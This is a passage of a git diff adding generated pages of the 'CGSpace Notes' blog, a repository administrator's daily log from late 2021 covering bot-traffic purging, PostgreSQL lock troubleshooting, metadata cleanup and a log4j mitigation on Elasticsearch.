+</span></span></code></pre></div><ul>
+<li>Then I updated the repository configurations and started a fresh harvest</li>
+<li>Help Francesca from the Alliance with a question about embargos on CGSpace items
+<ul>
+<li>I logged in as a normal user and a CGIAR user, and I was unable to access the PDF or full text of the item</li>
+<li>I was only able to access the PDF when I was logged in as an admin</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-11-21">2021-11-21</h2>
+<ul>
+<li>Update all Docker images on AReS (linode20) and re-build OpenRXV
+<ul>
+<li>Run all system updates and reboot the server</li>
+<li>Start a full harvest, but I notice that the number of items being harvested is not complete, so I stopped it</li>
+</ul>
+</li>
+<li>Run all system updates on CGSpace (linode18) and DSpace Test (linode26) and reboot them</li>
+<li>ICT finally got back to use about the passwords for SMTP so I updated that and tested it to make sure it&rsquo;s working</li>
+<li>Some bot with IP 87.203.87.141 in Greece is making tons of requests to XMLUI with the user agent <code>Microsoft Internet Explorer</code>
+<ul>
+<li>I added them to the list of IPs in nginx that get an HTTP 403 with a message to use a real user agent</li>
+<li>I will also purge all their requests from Solr:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
+</span></span><span style="display:flex;"><span>Purging 10893 hits from 87.203.87.141 in statistics
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 10893
+</span></span></code></pre></div><ul>
+<li>I did a bit more work documenting and tweaking the PostgreSQL configuration for CGSpace and DSpace Test in the Ansible infrastructure playbooks
+<ul>
+<li>I finally deployed the changes on both servers</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-11-22">2021-11-22</h2>
+<ul>
+<li>Udana asked me about validating on OpenArchives again
+<ul>
+<li>According to my notes we actually completed this in 2021-08, but for some reason we are no longer on the list and I can&rsquo;t validate again</li>
+<li>There seems to be a problem with their website because every link I try to validate says it received an HTTP 500 response from CGSpace</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-11-23">2021-11-23</h2>
+<ul>
+<li>Help RTB colleagues with thumbnail issues on their <a href="https://hdl.handle.net/10568/114576">2020 Annual Report</a>
+<ul>
+<li>The PDF seems to be in landscape mode or something and the first page is half width, so the thumbnail renders with the left half being white</li>
+<li>I generated a new one manually with libvips and it is better:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ vipsthumbnail AR<span style="color:#ae81ff">\ </span>RTB<span style="color:#ae81ff">\ </span>2020.pdf -s <span style="color:#ae81ff">600</span> -o <span style="color:#e6db74">&#39;%s.jpg[Q=85,optimize_coding,strip]&#39;</span>
+</span></span></code></pre></div><ul>
+<li>I sent an email to the OpenArchives.org contact to ask for help with the OAI validator
+<ul>
+<li>Someone responded to say that there have been a number of complaints about this on the oai-pmh mailing list recently&hellip;</li>
+</ul>
+</li>
+<li>I sent an email to Pythagoras from GARDIAN to ask if they can use a more specific user agent than &ldquo;Microsoft Internet Explorer&rdquo; for their scraper
+<ul>
+<li>He said he will change the user agent</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-11-24">2021-11-24</h2>
+<ul>
+<li>I had an idea to check our Solr statistics for hits from all the IPs that I have listed in nginx as being bots
+<ul>
+<li>Other than a few that I ruled out that <em>may</em> be humans, these are all making requests within one month or with no user agent, which is highly suspicious:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt
+</span></span><span style="display:flex;"><span>Found 8352 hits from 138.201.49.199 in statistics
+</span></span><span style="display:flex;"><span>Found 9374 hits from 78.46.89.18 in statistics
+</span></span><span style="display:flex;"><span>Found 2112 hits from 93.179.69.74 in statistics
+</span></span><span style="display:flex;"><span>Found 1 hits from 31.6.77.23 in statistics
+</span></span><span style="display:flex;"><span>Found 5 hits from 34.209.213.122 in statistics
+</span></span><span style="display:flex;"><span>Found 86772 hits from 163.172.68.99 in statistics
+</span></span><span style="display:flex;"><span>Found 77 hits from 163.172.70.248 in statistics
+</span></span><span style="display:flex;"><span>Found 15842 hits from 163.172.71.24 in statistics
+</span></span><span style="display:flex;"><span>Found 172954 hits from 104.154.216.0 in statistics
+</span></span><span style="display:flex;"><span>Found 3 hits from 188.134.31.88 in statistics
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of hits from bots: 295492
+</span></span></code></pre></div><h2 id="2021-11-27">2021-11-27</h2>
+<ul>
+<li>Peter sent me corrections for the authors that I had sent him back in 2021-09
+<ul>
+<li>I did a quick sanity check on them with OpenRefine, filtering out all the metadata with no replacements, then ran through my csv-metadata-quality script</li>
+<li>Then I imported them into my local instance as a test:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/fix-metadata-values.py -i /tmp/authors.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f dc.contributor.author -t <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#ae81ff">3</span>
+</span></span></code></pre></div><ul>
+<li>Then I imported to CGSpace and started a full Discovery re-index:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>real    272m43.818s
+</span></span><span style="display:flex;"><span>user    183m4.543s
+</span></span><span style="display:flex;"><span>sys     2m47.988
+</span></span></code></pre></div><h2 id="2021-11-28">2021-11-28</h2>
+<ul>
+<li>Run system updates on AReS server (linode20) and update all Docker containers and reboot
+<ul>
+<li>Then I started a fresh harvest as I always do on Sunday</li>
+</ul>
+</li>
+<li>I am experimenting with pinning npm version 7 on OpenRXV frontend because of these Angular errors:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>npm WARN EBADENGINE Unsupported engine {
+</span></span><span style="display:flex;"><span>npm WARN EBADENGINE   package: &#39;@angular-devkit/architect@0.901.15&#39;,
+</span></span><span style="display:flex;"><span>npm WARN EBADENGINE   required: { node: &#39;&gt;= 10.13.0&#39;, npm: &#39;^6.11.0 || ^7.5.6&#39;, yarn: &#39;&gt;= 1.13.0&#39; },
+</span></span><span style="display:flex;"><span>npm WARN EBADENGINE   current: { node: &#39;v12.22.7&#39;, npm: &#39;8.1.3&#39; }
+</span></span><span style="display:flex;"><span>npm WARN EBADENGINE }
+</span></span></code></pre></div><h2 id="2021-11-29">2021-11-29</h2>
+<ul>
+<li>Tezira reached out to me to say that submissions on CGSpace are taking forever</li>
+<li>I see a definite increase in locks in the last few days:</li>
+</ul>
+<p><img src="/cgspace-notes/2021/11/postgres_locks_ALL-week.png" alt="PostgreSQL locks week"></p>
+<ul>
+<li>The locks are all held by dspaceWeb (XMLUI):</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#34;SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid&#34;</span> | sort | uniq -c | sort -n
+</span></span><span style="display:flex;"><span>      1 
+</span></span><span style="display:flex;"><span>      1 ------------------
+</span></span><span style="display:flex;"><span>      1 (1394 rows)
+</span></span><span style="display:flex;"><span>      1  application_name 
+</span></span><span style="display:flex;"><span>      9  psql
+</span></span><span style="display:flex;"><span>   1385  dspaceWeb
+</span></span></code></pre></div><ul>
+<li>I restarted PostgreSQL and the locks dropped down:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#34;SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid&#34;</span> | sort | uniq -c | sort -n
+</span></span><span style="display:flex;"><span>      1
+</span></span><span style="display:flex;"><span>      1 ------------------
+</span></span><span style="display:flex;"><span>      1 (103 rows)
+</span></span><span style="display:flex;"><span>      1  application_name
+</span></span><span style="display:flex;"><span>      9  psql
+</span></span><span style="display:flex;"><span>     94  dspaceWeb
+</span></span></code></pre></div><h2 id="2021-11-30">2021-11-30</h2>
+<ul>
+<li>IWMI sent me ORCID identifiers for some new staff
+<ul>
+<li>We currently have 1332 unique identifiers, so this adds sixteen new ones:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/iwmi-orcids.txt | grep -oE <span style="color:#e6db74">&#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39;</span> | sort | uniq &gt; /tmp/2021-11-30-combined-orcids.txt
+</span></span><span style="display:flex;"><span>$ wc -l /tmp/2021-11-30-combined-orcids.txt
+</span></span><span style="display:flex;"><span>1348 /tmp/2021-11-30-combined-orcids.txt
+</span></span></code></pre></div><ul>
+<li>After I combined them and removed duplicates, I resolved all the names using my <code>resolve-orcids.py</code> script:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/resolve-orcids.py -i /tmp/2021-11-30-combined-orcids.txt -o /tmp/2021-11-30-combined-orcids-names.txt
+</span></span></code></pre></div><ul>
+<li>Then I updated some ORCID identifiers that had changed in the XML:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat 2021-11-30-fix-orcids.csv
+</span></span><span style="display:flex;"><span>cg.creator.identifier,correct
+</span></span><span style="display:flex;"><span>&#34;ADEBOWALE AKANDE: 0000-0002-6521-3272&#34;,&#34;ADEBOWALE AD AKANDE: 0000-0002-6521-3272&#34;
+</span></span><span style="display:flex;"><span>&#34;Daniel Ortiz Gonzalo: 0000-0002-5517-1785&#34;,&#34;Daniel Ortiz-Gonzalo: 0000-0002-5517-1785&#34;
+</span></span><span style="display:flex;"><span>&#34;FRIDAY ANETOR: 0000-0003-3137-1958&#34;,&#34;Friday Osemenshan Anetor: 0000-0003-3137-1958&#34;
+</span></span><span style="display:flex;"><span>&#34;Sander Muilerman: 0000-0001-9103-3294&#34;,&#34;Sander Muilerman-Rodrigo: 0000-0001-9103-3294&#34;
+</span></span><span style="display:flex;"><span>$ ./ilri/fix-metadata-values.py -i 2021-11-30-fix-orcids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f cg.creator.identifier -t <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#ae81ff">247</span>
+</span></span></code></pre></div><ul>
+<li>Tag existing items from the IWMI&rsquo;s new authors with ORCID iDs using <code>add-orcid-identifiers-csv.py</code> (7 new metadata fields added):</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat 2021-11-30-add-orcids.csv 
+</span></span><span style="display:flex;"><span>dc.contributor.author,cg.creator.identifier
+</span></span><span style="display:flex;"><span>&#34;Liaqat, U.W.&#34;,&#34;Umar Waqas Liaqat: 0000-0001-9027-5232&#34;
+</span></span><span style="display:flex;"><span>&#34;Liaqat, Umar Waqas&#34;,&#34;Umar Waqas Liaqat: 0000-0001-9027-5232&#34;
+</span></span><span style="display:flex;"><span>&#34;Munyaradzi, M.&#34;,&#34;Munyaradzi Junia Mutenje: 0000-0002-7829-9300&#34;
+</span></span><span style="display:flex;"><span>&#34;Mutenje, Munyaradzi&#34;,&#34;Munyaradzi Junia Mutenje: 0000-0002-7829-9300&#34;
+</span></span><span style="display:flex;"><span>&#34;Rex, William&#34;,&#34;William Rex: 0000-0003-4979-5257&#34;
+</span></span><span style="display:flex;"><span>&#34;Shrestha, Shisher&#34;,&#34;Nirman Shrestha: 0000-0002-0996-8611&#34;
+</span></span><span style="display:flex;"><span>$ ./ilri/add-orcid-identifiers-csv.py -i 2021-11-30-add-orcids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span>
+</span></span></code></pre></div><!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2021-12/index.html b/docs/2021-12/index.html
new file mode 100644
index 000000000..d9da2f183
--- /dev/null
+++ b/docs/2021-12/index.html
@@ -0,0 +1,631 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="December, 2021" />
+<meta property="og:description" content="2021-12-01
+
+Atmire merged some changes I had submitted to the COUNTER-Robots project
+I updated our local spider user agents and then re-ran the list with my check-spider-hits.sh script on CGSpace:
+
+$ ./ilri/check-spider-hits.sh -f /tmp/agents -p  
+Purging 1989 hits from The Knowledge AI in statistics
+Purging 1235 hits from MaCoCu in statistics
+Purging 455 hits from WhatsApp in statistics
+
+Total number of bot hits purged: 3679
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2021-12/" />
+<meta property="article:published_time" content="2021-12-01T16:07:07+02:00" />
+<meta property="article:modified_time" content="2022-01-09T10:39:51+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="December, 2021"/>
+<meta name="twitter:description" content="2021-12-01
+
+Atmire merged some changes I had submitted to the COUNTER-Robots project
+I updated our local spider user agents and then re-ran the list with my check-spider-hits.sh script on CGSpace:
+
+$ ./ilri/check-spider-hits.sh -f /tmp/agents -p  
+Purging 1989 hits from The Knowledge AI in statistics
+Purging 1235 hits from MaCoCu in statistics
+Purging 455 hits from WhatsApp in statistics
+
+Total number of bot hits purged: 3679
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "December, 2021",
+  "url": "https://alanorth.github.io/cgspace-notes/2021-12/",
+  "wordCount": "2686",
+  "datePublished": "2021-12-01T16:07:07+02:00",
+  "dateModified": "2022-01-09T10:39:51+02:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2021-12/">
+
+    <title>December, 2021 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-12/">December, 2021</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2021-12-01T16:07:07+02:00">Wed Dec 01, 2021</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-12-01">2021-12-01</h2>
+<ul>
+<li>Atmire merged some changes I had submitted to the COUNTER-Robots project</li>
+<li>I updated our local spider user agents and then re-ran the list with my <code>check-spider-hits.sh</code> script on CGSpace:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f /tmp/agents -p  
+</span></span><span style="display:flex;"><span>Purging 1989 hits from The Knowledge AI in statistics
+</span></span><span style="display:flex;"><span>Purging 1235 hits from MaCoCu in statistics
+</span></span><span style="display:flex;"><span>Purging 455 hits from WhatsApp in statistics
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 3679
+</span></span></code></pre></div><h2 id="2021-12-02">2021-12-02</h2>
+<ul>
+<li>Francesca from Alliance asked me for help with approving a submission that gets stuck
+<ul>
+<li>I looked at the PostgreSQL activity and the locks are back up like they were earlier this week</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#34;SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid&#34;</span> | sort | uniq -c | sort -n
+</span></span><span style="display:flex;"><span>      1 
+</span></span><span style="display:flex;"><span>      1 ------------------
+</span></span><span style="display:flex;"><span>      1 (1437 rows)
+</span></span><span style="display:flex;"><span>      1  application_name 
+</span></span><span style="display:flex;"><span>      9  psql
+</span></span><span style="display:flex;"><span>   1428  dspaceWeb
+</span></span></code></pre></div><ul>
+<li>Munin shows the same:</li>
+</ul>
+<p><img src="/cgspace-notes/2021/12/postgres_locks_ALL-week.png" alt="PostgreSQL locks week"></p>
+<ul>
+<li>Last month I enabled the <code>log_lock_waits</code> in PostgreSQL so I checked the log and was surprised to find only a few since I restarted PostgreSQL three days ago:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># grep -E <span style="color:#e6db74">&#39;^2021-(11-29|11-30|12-01|12-02)&#39;</span> /var/log/postgresql/postgresql-10-main.log | grep -c <span style="color:#e6db74">&#39;still waiting for&#39;</span>
+</span></span><span style="display:flex;"><span>15
+</span></span></code></pre></div><ul>
+<li>I think you could analyze the locks for the <code>dspaceWeb</code> user (XMLUI) and find out what queries were locking&hellip; but it&rsquo;s so much information and I don&rsquo;t know where to start
+<ul>
+<li>For now I just restarted PostgreSQL&hellip;</li>
+<li>Francesca was able to do her submission immediately&hellip;</li>
+</ul>
+</li>
+<li>On a related note, I want to enable the <code>pg_stat_statement</code> feature to see which queries get run the most, so I created the extension on the CGSpace database</li>
+<li>I was doing some research on PostgreSQL locks and found some interesting things to consider
+<ul>
+<li>The default <code>lock_timeout</code> is 0, aka disabled</li>
+<li>The default <code>statement_timeout</code> is 0, aka disabled</li>
+<li>It seems to be recommended to start by setting <code>statement_timeout</code> first, rule of thumb <a href="https://github.com/jberkus/annotated.conf/blob/master/postgresql.10.simple.conf#L211">ten times longer than your longest query</a></li>
+</ul>
+</li>
+<li>Mark Wood mentioned the <code>checker</code> cron job that apparently runs in one transaction and might be an issue
+<ul>
+<li>I definitely saw it holding a bunch of locks for ~30 minutes during the first part of its execution, then it dropped them and did some other less-intensive things without locks</li>
+</ul>
+</li>
+<li>Bizuwork was still not receiving emails even after we fixed the SMTP access on CGSpace
+<ul>
+<li>After some troubleshooting it turns out that the emails from CGSpace were going in her Junk!</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-12-03">2021-12-03</h2>
+<ul>
+<li>I see GARDIAN is now using a &ldquo;GARDIAN&rdquo; user agent finally
+<ul>
+<li>I will add them to our local spider agent override in DSpace so that the hits don&rsquo;t get counted in Solr</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-12-05">2021-12-05</h2>
+<ul>
+<li>Proof fifty records Abenet sent me from Africa Rice Center (&ldquo;AfricaRice 1st batch Import&rdquo;)
+<ul>
+<li>Fixed forty-six incorrect collections</li>
+<li>Cleaned up and normalize affiliations</li>
+<li>Cleaned up dates (extra <code>*</code> character in all?)</li>
+<li>Cleaned up citation format</li>
+<li>Fixed some encoding issues in abstracts</li>
+<li>Removed empty columns</li>
+<li>Removed one duplicate: Enhancing Rice Productivity and Soil Nitrogen Using Dual-Purpose Cowpea-NERICA® Rice Sequence in Degraded Savanna</li>
+<li>Added volume and issue metadata by extracting it from the citations</li>
+<li>All PDFs hosted on davidpublishing.com are dead&hellip;</li>
+<li>All DOIs linking to African Journal of Agricultural Research are dead&hellip;</li>
+<li>Fixed a handful of items marked as &ldquo;Open Access&rdquo; that are actually closed</li>
+<li>Added many missing ISSNs</li>
+<li>Added many missing countries/regions</li>
+<li>Fixed invalid AGROVOC terms and added some more based on article subjects</li>
+</ul>
+</li>
+<li>I also made some minor changes to the <a href="https://github.com/ilri/csv-metadata-quality">CSV Metadata Quality Checker</a>
+<ul>
+<li>Added the ability to check if the item&rsquo;s title exists in the citation</li>
+<li>Updated to only run the mojibake check if we&rsquo;re not running in unsafe mode (so we don&rsquo;t print the same warning during both the check and fix steps)</li>
+</ul>
+</li>
+<li>I ran the re-harvesting on AReS</li>
+</ul>
+<h2 id="2021-12-06">2021-12-06</h2>
+<ul>
+<li>Some minor work on the <code>check-duplicates.py</code> script I wrote last month
+<ul>
+<li>I found some corner cases where there were items that matched in the database, but they were <code>in_archive=f</code> and or <code>withdrawn=t</code> so I check that before trying to resolve the handles of potential duplicates</li>
+</ul>
+</li>
+<li>More work on the Africa Rice Center 1st batch import
+<ul>
+<li>I merged the metadata for three duplicates in Africa Rice&rsquo;s items and mapped them on CGSpace</li>
+<li>I did a bit more work to add missing AGROVOC subjects, countries, regions, extents, etc and then uploaded the forty-six items to CGSpace</li>
+</ul>
+</li>
+<li>I started looking at the seventy CAS records that Abenet has been working on for the past few months</li>
+</ul>
+<h2 id="2021-12-07">2021-12-07</h2>
+<ul>
+<li>I sent Vini from CGIAR CAS some questions about the seventy records I was working on yesterday
+<ul>
+<li>Also, I ran the <code>check-duplicates.py</code> script on them and found that they might ALL be duplicates!!!</li>
+<li>I tweaked the script a bit more to use the issue dates as a third criteria and now there are less duplicates, but it&rsquo;s still at least twenty or so&hellip;</li>
+<li>The script now checks if the issue date of the item in the CSV and the issue date of the item in the database are less than 365 days apart (by default)</li>
+<li>For example, many items like &ldquo;Annual Report 2020&rdquo; can have similar title and type to previous annual reports, but are not duplicates</li>
+</ul>
+</li>
+<li>I noticed a strange user agent in the XMLUI logs on CGSpace:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>20.84.225.129 - - [07/Dec/2021:11:51:24 +0100] &#34;GET /handle/10568/33203 HTTP/1.1&#34; 200 6328 &#34;-&#34; &#34;python-requests/2.25.1&#34;
+</span></span><span style="display:flex;"><span>20.84.225.129 - - [07/Dec/2021:11:51:27 +0100] &#34;GET /handle/10568/33203 HTTP/2.0&#34; 200 6315 &#34;-&#34; &#34;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/88.0.4298.0 Safari/537.36&#34;
+</span></span></code></pre></div><ul>
+<li>I looked into it more and I see a dozen other IPs using that user agent, and they are all owned by Microsoft
+<ul>
+<li>It could be someone on Azure?</li>
+<li>I opened <a href="https://github.com/atmire/COUNTER-Robots/pull/49">a pull request to COUNTER-Robots</a> and I&rsquo;ll add this user agent to our local override until they decide to include it or not</li>
+</ul>
+</li>
+<li>I purged 34,000 hits from this user agent in our Solr statistics:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
+</span></span><span style="display:flex;"><span>Purging 34458 hits from HeadlessChrome in statistics
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 34458
+</span></span></code></pre></div><ul>
+<li>Meeting with partners about repositories in the One CGIAR</li>
+</ul>
+<h2 id="2021-12-08">2021-12-08</h2>
+<ul>
+<li>Finalize country/region changes in csv-metadata-quality checker and release v0.5.0: <a href="https://github.com/ilri/csv-metadata-quality/releases/tag/v0.5.0">https://github.com/ilri/csv-metadata-quality/releases/tag/v0.5.0</a>
+<ul>
+<li>This also includes the mojibake fixes and title/citation checks and some bug fixes</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-12-09">2021-12-09</h2>
+<ul>
+<li>Help Francesca upload the dataset for one CIAT publication (it has like 100 authors so we did it via CSV)</li>
+</ul>
+<h2 id="2021-12-12">2021-12-12</h2>
+<ul>
+<li>Patch OpenRXV&rsquo;s Elasticsearch for the CVE-2021-44228 log4j vulnerability and re-deploy AReS
+<ul>
+<li>I added <code>-Dlog4j2.formatMsgNoLookups=true</code> to the Elasticsearch Java environment</li>
+</ul>
+</li>
+<li>Run AReS harvesting</li>
+</ul>
+<h2 id="2021-12-13">2021-12-13</h2>
+<ul>
+<li>I ran the <code>check-duplicates.py</code> script on the 1,000 items from the CGIAR System Office TAC/ICW/Green Cover archives and found hundreds or thousands of potential duplicates
+<ul>
+<li>I sent feedback to Gaia</li>
+</ul>
+</li>
+<li>Help Jacquie from WorldFish try to find all outputs for the Fish CRP because there are a few different formats for that name</li>
+<li>Create a temporary account for Rafael Rodriguez on DSpace Test so he can investigate the submission workflow
+<ul>
+<li>I added him to the admin group on the Alliance community&hellip;</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-12-14">2021-12-14</h2>
+<ul>
+<li>I finally caught some stuck locks on CGSpace after checking several times per day for the last week:</li>
+</ul>
